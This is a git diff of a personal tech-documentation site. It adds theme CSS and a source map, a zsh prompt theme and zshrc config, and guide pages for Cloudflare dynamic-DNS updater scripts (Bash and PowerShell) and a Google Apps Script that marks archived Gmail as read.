fg-color--light:#25c5da;--md-primary-fg-color--dark:#0097a8;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=teal]{--md-primary-fg-color:#009485;--md-primary-fg-color--light:#26a699;--md-primary-fg-color--dark:#007a6c;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=green]{--md-primary-fg-color:#4cae4f;--md-primary-fg-color--light:#68bb6c;--md-primary-fg-color--dark:#398e3d;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=light-green]{--md-primary-fg-color:#8bc34b;--md-primary-fg-color--light:#9ccc66;--md-primary-fg-color--dark:#689f38;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=lime]{--md-primary-fg-color:#cbdc38;--md-primary-fg-color--light:#d3e156;--md-primary-fg-color--dark:#b0b52c;--md-primary-bg-color:#000000de;--md-primary-bg-color--light:#0000008a}[data-md-color-primary=yellow]{--md-primary-fg-color:#ffec3d;--md-primary-fg-color--light:#ffee57;--md-primary-fg-color--dark:#fbc02d;--md-primary-bg-color:#000000de;--md-primary-bg-color--light:#0000008a}[data-md-color-primary=amber]{--md-primary-fg-color:#ffc105;--md-primary-fg-color--light:#ffc929;--md-primary-fg-color--dark:#ffa200;--md-primary-bg-color:#000000de;--md-primary-bg-color--light:#0000008a}[data-md-color-primary=orange]{--md-primary-fg-color:#ffa724;--md-primary-fg-color--light:#ffa724;--md-primary-fg-color--dark:#fa8900;--md-primary-bg-color:#000000de;--md-primary-bg-color--light:#0000008a}[data-md-color-primary=deep-orange]{--md-primary-fg-color:#ff6e42;--md-primary-fg-color--light:#ff8a66;--md-primary-fg-color--dark:#f4511f;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=brown]{--md-primary-fg-color:#795649;--md-primary-fg-color--light:#8d6e62;--md-primary-fg-color--dark:#5d4037;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3}[data-md-color-primary=grey]{--md-primary-fg-color:#757575;--md-primary-fg-color--light:#9e9e9e;--md-primary-fg-color--dark:#616161;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3;--md-typeset-a-color:#4051b5}[data-md-color-primary=blue-grey]{--md-primary-fg-color:#546d78;--md-primary-fg-color--light:#607c8a;--md-primary-fg-color--dark:#455a63;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3;--md-typeset-a-color:#4051b5}[data-md-color-primary=light-green]:not([data-md-color-scheme=slate]){--md-typeset-a-color:#72ad2e}[data-md-color-primary=lime]:not([data-md-color-scheme=slate]){--md-typeset-a-color:#8b990a}[data-md-color-primary=yellow]:not([data-md-color-scheme=slate]){--md-typeset-a-color:#b8a500}[data-md-color-primary=amber]:not([data-md-color-scheme=slate]){--md-typeset-a-color:#d19d00}[data-md-color-primary=orange]:not([data-md-color-scheme=slate]){--md-typeset-a-color:#e68a00}[data-md-color-primary=white]{--md-primary-fg-color:#fff;--md-primary-fg-color--light:#ffffffb3;--md-primary-fg-color--dark:#00000012;--md-primary-bg-color:#000000de;--md-primary-bg-color--light:#0000008a;--md-typeset-a-color:#4051b5}[data-md-color-primary=white] .md-button{color:var(--md-typeset-a-color)}[data-md-color-primary=white] .md-button--primary{background-color:var(--md-typeset-a-color);border-color:var(--md-typeset-a-color);color:#fff}@media screen and (min-width:60em){[data-md-color-primary=white] .md-search__form{background-color:#00000012}[data-md-color-primary=white] .md-search__form:hover{background-color:#00000052}[data-md-color-primary=white] .md-search__input+.md-search__icon{color:#000000de}}@media screen and (min-width:76.25em){[data-md-color-primary=white] .md-tabs{border-bottom:.05rem solid #00000012}}[data-md-color-primary=black]{--md-primary-fg-color:#000;--md-primary-fg-color--light:#0000008a;--md-primary-fg-color--dark:#000;--md-primary-bg-color:#fff;--md-primary-bg-color--light:#ffffffb3;--md-typeset-a-color:#4051b5}[data-md-color-primary=black] .md-button{color:var(--md-typeset-a-color)}[data-md-color-primary=black] .md-button--primary{background-color:var(--md-typeset-a-color);border-color:var(--md-typeset-a-color);color:#fff}[data-md-color-primary=black] .md-header{background-color:#000}@media screen and (max-width:59.9375em){[data-md-color-primary=black] .md-nav__source{background-color:#000000de}}@media screen and (min-width:60em){[data-md-color-primary=black] .md-search__form{background-color:#ffffff1f}[data-md-color-primary=black] .md-search__form:hover{background-color:#ffffff4d}}@media screen and (max-width:76.1875em){html [data-md-color-primary=black] .md-nav--primary .md-nav__title[for=__drawer]{background-color:#000}}@media screen and (min-width:76.25em){[data-md-color-primary=black] .md-tabs{background-color:#000}}
\ No newline at end of file
diff --git a/assets/stylesheets/palette.ecc896b0.min.css.map b/assets/stylesheets/palette.ecc896b0.min.css.map
new file mode 100644
index 000000000..d616c2a6d
--- /dev/null
+++ b/assets/stylesheets/palette.ecc896b0.min.css.map
@@ -0,0 +1 @@
+{"version":3,"sources":["src/assets/stylesheets/palette/_scheme.scss","../../../src/assets/stylesheets/palette.scss","src/assets/stylesheets/palette/_accent.scss","src/assets/stylesheets/palette/_primary.scss","src/assets/stylesheets/utilities/_break.scss"],"names":[],"mappings":"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","file":"palette.css"}
\ No newline at end of file
diff --git a/assets/zsh/3os.zsh-theme b/assets/zsh/3os.zsh-theme
new file mode 100644
index 000000000..a5b2ccd32
--- /dev/null
+++ b/assets/zsh/3os.zsh-theme
@@ -0,0 +1,32 @@
+local return_code="%(?..%{$fg[red]%}%? ↵%{$reset_color%})"
+local user_host="(%B%(!.%{$fg[red]%}.%{$fg[green]%})%n@%m%{$reset_color%}) "
+local user_symbol='%(!.#.$)'
+local current_dir="[%B%{$fg[blue]%}%~%{$reset_color%}] "
+
+local vcs_branch='$(git_prompt_info)$(hg_prompt_info)'
+local rvm_ruby='$(ruby_prompt_info)'
+local venv_prompt='$(virtualenv_prompt_info)'
+
+ZSH_THEME_RVM_PROMPT_OPTIONS="i v g"
+
+PROMPT="┌──${user_host}${current_dir}${rvm_ruby}${vcs_branch}${venv_prompt} [%*]
+└─%B${user_symbol}%b "
+RPROMPT="%B${return_code}%b"
+
+ZSH_THEME_GIT_PROMPT_PREFIX="[%{$fg[yellow]%}"
+ZSH_THEME_GIT_PROMPT_SUFFIX="%{$reset_color%}]"
+ZSH_THEME_GIT_PROMPT_DIRTY=" %{$fg[red]%}✗%{$reset_color%}"
+ZSH_THEME_GIT_PROMPT_CLEAN=" %{$fg[green]%}✔%{$reset_color%}"
+
+ZSH_THEME_HG_PROMPT_PREFIX="$ZSH_THEME_GIT_PROMPT_PREFIX"
+ZSH_THEME_HG_PROMPT_SUFFIX="$ZSH_THEME_GIT_PROMPT_SUFFIX"
+ZSH_THEME_HG_PROMPT_DIRTY="$ZSH_THEME_GIT_PROMPT_DIRTY"
+ZSH_THEME_HG_PROMPT_CLEAN="$ZSH_THEME_GIT_PROMPT_CLEAN"
+
+ZSH_THEME_RUBY_PROMPT_PREFIX="%{$fg[red]%}‹"
+ZSH_THEME_RUBY_PROMPT_SUFFIX="› %{$reset_color%}"
+
+ZSH_THEME_VIRTUAL_ENV_PROMPT_PREFIX=" (%{$fg[green]%}"
+ZSH_THEME_VIRTUAL_ENV_PROMPT_SUFFIX="%{$reset_color%})"
+ZSH_THEME_VIRTUALENV_PREFIX="$ZSH_THEME_VIRTUAL_ENV_PROMPT_PREFIX"
+ZSH_THEME_VIRTUALENV_SUFFIX="$ZSH_THEME_VIRTUAL_ENV_PROMPT_SUFFIX"
diff --git a/assets/zsh/zshrc_config b/assets/zsh/zshrc_config
new file mode 100644
index 000000000..5516c44d2
--- /dev/null
+++ b/assets/zsh/zshrc_config
@@ -0,0 +1,111 @@
+# If you come from bash you might have to change your $PATH.
+# export PATH=$HOME/bin:/usr/local/bin:$PATH
+
+# Path to your oh-my-zsh installation.
+export ZSH="$HOME/.oh-my-zsh"
+
+# Set name of the theme to load --- if set to "random", it will
+# load a random theme each time oh-my-zsh is loaded, in which case,
+# to know which specific one was loaded, run: echo $RANDOM_THEME
+# See https://github.com/ohmyzsh/ohmyzsh/wiki/Themes
+ZSH_THEME="3os"
+
+# Set list of themes to pick from when loading at random
+# Setting this variable when ZSH_THEME=random will cause zsh to load
+# a theme from this variable instead of looking in $ZSH/themes/
+# If set to an empty array, this variable will have no effect.
+# ZSH_THEME_RANDOM_CANDIDATES=( "robbyrussell" "agnoster" )
+
+# Uncomment the following line to use case-sensitive completion.
+# CASE_SENSITIVE="true"
+
+# Uncomment the following line to use hyphen-insensitive completion.
+# Case-sensitive completion must be off. _ and - will be interchangeable.
+# HYPHEN_INSENSITIVE="true"
+
+# Uncomment the following line to disable bi-weekly auto-update checks.
+# DISABLE_AUTO_UPDATE="true"
+
+# Uncomment the following line to automatically update without prompting.
+# DISABLE_UPDATE_PROMPT="true"
+
+# Uncomment the following line to change how often to auto-update (in days).
+# export UPDATE_ZSH_DAYS=13
+
+# Uncomment the following line if pasting URLs and other text is messed up.
+# DISABLE_MAGIC_FUNCTIONS="true"
+
+# Uncomment the following line to disable colors in ls.
+# DISABLE_LS_COLORS="true"
+
+# Uncomment the following line to disable auto-setting terminal title.
+# DISABLE_AUTO_TITLE="true"
+
+# Uncomment the following line to enable command auto-correction.
+# ENABLE_CORRECTION="true"
+
+# Uncomment the following line to display red dots whilst waiting for completion.
+# Caution: this setting can cause issues with multiline prompts (zsh 5.7.1 and newer seem to work)
+# See https://github.com/ohmyzsh/ohmyzsh/issues/5765
+# COMPLETION_WAITING_DOTS="true"
+
+# Uncomment the following line if you want to disable marking untracked files
+# under VCS as dirty. This makes repository status check for large repositories
+# much, much faster.
+# DISABLE_UNTRACKED_FILES_DIRTY="true"
+
+# Uncomment the following line if you want to change the command execution time
+# stamp shown in the history command output.
+# You can set one of the optional three formats:
+# "mm/dd/yyyy"|"dd.mm.yyyy"|"yyyy-mm-dd"
+# or set a custom format using the strftime function format specifications,
+# see 'man strftime' for details.
+# HIST_STAMPS="mm/dd/yyyy"
+
+# Would you like to use another custom folder than $ZSH/custom?
+# ZSH_CUSTOM=/path/to/new-custom-folder
+
+# Which plugins would you like to load?
+# Standard plugins can be found in $ZSH/plugins/
+# Custom plugins may be added to $ZSH_CUSTOM/plugins/
+# Example format: plugins=(rails git textmate ruby lighthouse)
+# Add wisely, as too many plugins slow down shell startup.
+plugins=(git colored-man-pages docker docker-compose iterm2 node npm brew colorize macos pip pyenv virtualenv adb aws command-not-found zsh-autosuggestions zsh-syntax-highlighting)
+
+source $ZSH/oh-my-zsh.sh
+
+# User configuration
+
+# export MANPATH="/usr/local/man:$MANPATH"
+
+# You may need to manually set your language environment
+# export LANG=en_US.UTF-8
+
+# Preferred editor for local and remote sessions
+# if [[ -n $SSH_CONNECTION ]]; then
+# export EDITOR='vim'
+# else
+# export EDITOR='mvim'
+# fi
+
+# Compilation flags
+# export ARCHFLAGS="-arch x86_64"
+
+# Set personal aliases, overriding those provided by oh-my-zsh libs,
+# plugins, and themes. Aliases can be placed here, though oh-my-zsh
+# users are encouraged to define aliases within the ZSH_CUSTOM folder.
+# For a full list of active aliases, run `alias`.
+#
+# Example aliases
+# alias zshconfig="mate ~/.zshrc"
+# alias ohmyzsh="mate ~/.oh-my-zsh"
+
+# Screenfetch
+if which screenfetch >/dev/null; then
+ screenfetch
+fi
+
+## Fix for Slow zsh-autosuggestions copy&paste
+autoload -Uz bracketed-paste-magic
+zle -N bracketed-paste bracketed-paste-magic
+zstyle ':bracketed-paste-magic' active-widgets '.self-*'
diff --git a/automation/ddns-cloudflare-bash/index.html b/automation/ddns-cloudflare-bash/index.html
new file mode 100644
index 000000000..ff6875d04
--- /dev/null
+++ b/automation/ddns-cloudflare-bash/index.html
@@ -0,0 +1,186 @@
+
DDNS Cloudflare Bash - 3os automation cloudflare ddns bash Authors: fire1ce | Created: 2022-04-03 | Last update: 2022-04-03 DDNS Cloudflare Bash Script When building complex infrastructure and managing multiple servers and services using ip addresses is can create a lot of issues and is not always easy to manage. The preferred way is to use a DNS provider that allows you to manage your domain names and their associated IP addresses. DDNS Cloudflare Bash script is a simple bash script that allows you to easily update your Cloudflare's DNS records
dinamically regardless of your current IP address. DDNS Cloudflare Bash Script can be used on Linux, Unix, FreeBSD, and macOS with only one requirment of curl
Source code can be found at DDNS Cloudflare Bash Github Repository .
About DDNS Cloudflare Bash Script for most Linux , Unix distributions and MacOS . Choose any source IP address to update external or internal (WAN/LAN) . For multiply lan interfaces like Wifi, Docker Networks and Bridges the script will automatically detects the primary Interface by priority. Cloudflare's options proxy and TTL configurable via the config file. Optional Telegram Notifications Requirements curl Cloudflare api-token with ZONE-DNS-EDIT Permissions DNS Record must be pre created (api-token should only edit dns records) Creating Cloudflare API Token To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container Installation You can place the script at any location manually.
MacOS : Don't use the /usr/local/bin/ for the script location. Create a separate folder under your user path /Users/${USER}
The automatic install examples below will place the script at /usr/local/bin/
wget https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/update-cloudflare-dns.sh
+sudo chmod +x update-cloudflare-dns.sh
+sudo mv update-cloudflare-dns.sh /usr/local/bin/update-cloudflare-dns
+
Config file You can use default config file update-cloudflare-dns.conf or pass your own config file as parameter to script.
wget https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/update-cloudflare-dns.conf
+
Place the config file in the directory as the update-cloudflare-dns for above example at /usr/local/bin/
sudo mv update-cloudflare-dns.conf /usr/local/bin/update-cloudflare-dns.conf
+
Config Parameters Option Example Description what_ip internal Which IP should be used for the record: internal/external dns_record ddns.example.com DNS A record which will be updated, you can pass multiple A records separated by comma cloudflare_zone_api_token ChangeMe Cloudflare API Token KEEP IT PRIVATE!!!! zoneid ChangeMe Cloudflare's Zone ID proxied false Use Cloudflare proxy on dns record true/false ttl 120 120-7200 in seconds or 1 for Auto
Optional Notifications Parameters Option Example Description notify_me_telegram yes Use Telegram notifications yes/no telegram_chat_id ChangeMe Chat ID of the bot telegram_bot_API_Token ChangeMe Telegram's Bot API Token
Running The Script When placed in /usr/local/bin/
With your config file (need to be placed in same folder)
update-cloudflare-dns yoru_config.conf
+
Or manually
<path>/.update-cloudflare-dns.sh
+
Automation With Crontab You can run the script via crontab
Examples Run every minute
* * * * * /usr/local/bin/update-cloudflare-dns
+
Run with your specific config file
* * * * * /usr/local/bin/update-cloudflare-dns myconfig.conf
+
Run every 2 minutes
*/2 * * * * /usr/local/bin/update-cloudflare-dns
+
Run at boot
@reboot /usr/local/bin/update-cloudflare-dns
+
Run 1 minute after boot
@reboot sleep 60 && /usr/local/bin/update-cloudflare-dns
+
Run at 08:00
0 8 * * * /usr/local/bin/update-cloudflare-dns
+
Logs This Script will create a log file with only the last run information Log file will be located at the script's location.
Example:
/usr/local/bin/update-cloudflare-dns.log
+
Limitations License MIT License Copyright© 3os.org @2020
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Back to top
\ No newline at end of file
diff --git a/automation/ddns-cloudflare-powershell/index.html b/automation/ddns-cloudflare-powershell/index.html
new file mode 100644
index 000000000..5d5a8154e
--- /dev/null
+++ b/automation/ddns-cloudflare-powershell/index.html
@@ -0,0 +1,172 @@
+
DDNS Cloudflare PowerShell - 3os automation cloudflare ddns powershell Authors: fire1ce | Created: 2022-04-03 | Last update: 2022-04-24 DDNS Cloudflare PowerShell Script When building complex infrastructure and managing multiple servers and services using ip addresses is can create a lot of issues and is not always easy to manage. The preferred way is to use a DNS provider that allows you to manage your domain names and their associated IP addresses. DDNS Cloudflare PowerShell script is a simple PowerShell script that allows you to easily update your Cloudflare's DNS records
dinamically regardless of your current IP address. DDNS Cloudflare PowerShell Script can be used on Windows operating systems without any requirements for PowerShell.
Source code can be found at DDNS Cloudflare PowerShell Github Repository .
DDNS Cloudflare PowerShell script for Windows . Choose any source IP address to update external or internal (WAN/LAN) . For multiple LAN interfaces like Wifi, Docker Networks and Bridges the script will automatically detect the primary Interface by priority. Cloudflare's options for proxy and TTL configurable via the parameters. Optional Telegram or Discord Notifications Requirements Cloudflare api-token with ZONE-DNS-EDIT Permissions DNS Record must be pre created (api-token should only edit dns records) Enabled running unsigned PowerShell Creating Cloudflare API Token To create a CloudFlare API token for your DNS zone go to https://dash.cloudflare.com/profile/api-tokens and follow these steps:
Click Create Token Select Create Custom Token Provide the token a name, for example, example.com-dns-zone-readonly
Grant the token the following permissions: - Zone - DNS - Edit Set the zone resources to: - Include - Specific Zone - example.com
Complete the wizard and use the generated token at the CLOUDFLARE_API_TOKEN
variable for the container Installation Download the DDNS-Cloudflare-PowerShell zip file & Unzip, rename the folder to DDNS-Cloudflare-PowerShell place in a directory of your choosing
Config Parameters Update the config parameters inside the update-cloudflare-dns_conf.ps1 by editing accordingly. See below for examples.
Option Example Description what_ip internal Which IP should be used for the record: internal/external dns_record ddns.example.com DNS A record which will be updated cloudflare_zone_api_token ChangeMe Cloudflare API Token KEEP IT PRIVATE!!!! zoneid ChangeMe Cloudflare's Zone ID proxied false Use Cloudflare proxy on dns record true/false ttl 120 120-7200 in seconds or 1 for Auto
Optional Notifications Parameters for Telegram Option Example Description notify_me_telegram yes Use Telegram notifications yes/no telegram_chat_id ChangeMe Chat ID of the bot telegram_bot_API_Token ChangeMe Telegram's Bot API Token
Optional Notification Parameters for Discord Option Example Description notify_me_discord yes Use Discord notifications yes/no discord_webhook_URL http://WebhookURL.com/asd/ Webhook URL from your Discord server settings
To generate a webhook URL, follow the official Discord instructions .
Running The Script Open cmd/powershell
Example:
powershell.exe -ExecutionPolicy Bypass -File C:\D DNS-Cloudflare-PowerShell\u pdate-cloudflare-dns.ps1
+
Automation With Windows Task Scheduler Example: Run at boot with 1 min delay and repeat every 1 min
Open Task Scheduler Action -> Crate Task General Menu Name: update-cloudflare-dns Run whether user is logged on or not Trigger New... Begin the task: At startup Delay task for: 1 minute Repeat task every: 1 minute for duration of: indefinitely Enabled Actions New... Action: Start a Program Program/script: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add arguments: -ExecutionPolicy Bypass -File C:\DDNS-Cloudflare-PowerShell\update-cloudflare-dns.ps1 ok Enter your user's password when prompted Conditions Power: Uncheck - [x] Start the task only if the computer is on AC power Logs This Script will create a log file with only the last run information Log file will be located as same directory as update-cloudflare-dns.ps1
Log file name:
update-cloudflare-dns.log
+
License MIT License Copyright© 3os.org @2020
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Back to top
\ No newline at end of file
diff --git a/automation/gmail-mark-archived-mail-as-read/index.html b/automation/gmail-mark-archived-mail-as-read/index.html
new file mode 100644
index 000000000..f29630146
--- /dev/null
+++ b/automation/gmail-mark-archived-mail-as-read/index.html
@@ -0,0 +1,173 @@
+
Gmail Mark Archived as Read - 3os Authors: fire1ce | Created: 2022-04-03 | Last update: 2022-04-24 Automatically Mark Archived Email as Read in Gmail Background My preferred method of managing emails in Gmail is Zero Inbox
. In short, emails in Inbox work as to-do list. The Inbox may contain important email i need to attend or a digital receipt from a payment I've made a minute ago. Since I know the content of that email the task is done and I archive it. This email will move from Inbox to All Mail or a dedicated label if you have automation rules.
The Problem When using the Archive
function email which weren't opened or marked as Read
will show as number counter in All Mail or Dedicated Label. Since I'm done with those emails I have to manually mark emails as read. This is a tedious task and I don't want to do it manually
The Solution Using Google Scripts We can create a personal app
that will automatically mark emails as read when they are archived. This is a simple script that will run on Gmail and will mark emails as read when they are no longer in the inbox folder. You can choose how often you want to automatically mark archived email as read in gmail. This solution was tested on personal Gmail accounts and the Google Workspace Gmail accounts (as long you can grunt permission).
Installation Make sure you are logged in to your Google account. Open Google Scripts and create a new project.
You will be prompted with a new windwos. Rename the project to Automatically Mark Archived Email as Read
. Copy and repace the following code to the new project.
function markArchivedAsRead () {
+ var threads = GmailApp . search ( 'label:unread -label:inbox' , 0 , 100 );
+ GmailApp . markThreadsRead ( threads );
+ var spamThreads = GmailApp . search ( 'label:spam -label:inbox' , 0 , 100 );
+ GmailApp . markThreadsRead ( spamThreads );
+}
+
Your windwos should look like this:
Save the project.
After saving the project you should be able Run the script.
On the first run the script will ask you to give it the necessary permissions. Click Review permissions
to continue.
Since the app
is not signed you will be prompted with a warning. I's ok and safe. Click Advanced
.
Click Go to Gmail Mark Archived as Read (unsafe)
to continue.
At this point you will be prompted to grant the script Automatically Mark Archived Email as Read
access to your Gmail account. Click Allow
. This will alow the script to perform the actions you need.
If all went well you should see the log of the script as show bellow.
At this point we create a Automatically Mark Archived Email as Read
script and grunt it the necessary permissions. NNow we want to automate the process. We can do this by creating a new timed trigger. Head over the Trigger menu
Click Add Trigger
.
You will be prompted to select when and how the script will run. The following example will run the script every 5 minutes, and send a failure email report onece a week.
Note
The script may fail onces in a while. This is due to the fact it depends on Gmail's API. Unless you receive an email with hunders of failed attempts, you can ignore the email.
Note
Update: Some people are reporting an error which says "This operation can only be applied to at most 100 threads. (line 3, file "Code")". To fix this, you have to manually do a search for "is:unread" and mark all of them as read before running the script, so that it starts with a clean slate. The script can only process 100 threads per run, so if you give it more than 100 on the first run,
After creating the trigger you screen should look like this:
Now we whant to ensure that the script runs every 5 minutes. We can do this in Execution
menu:
When 5 minutes passed from the point the trigger was created, the page log should look like this:
We are done with the installation and the configuration. You should already be able to see that some of the emails are marked as read.
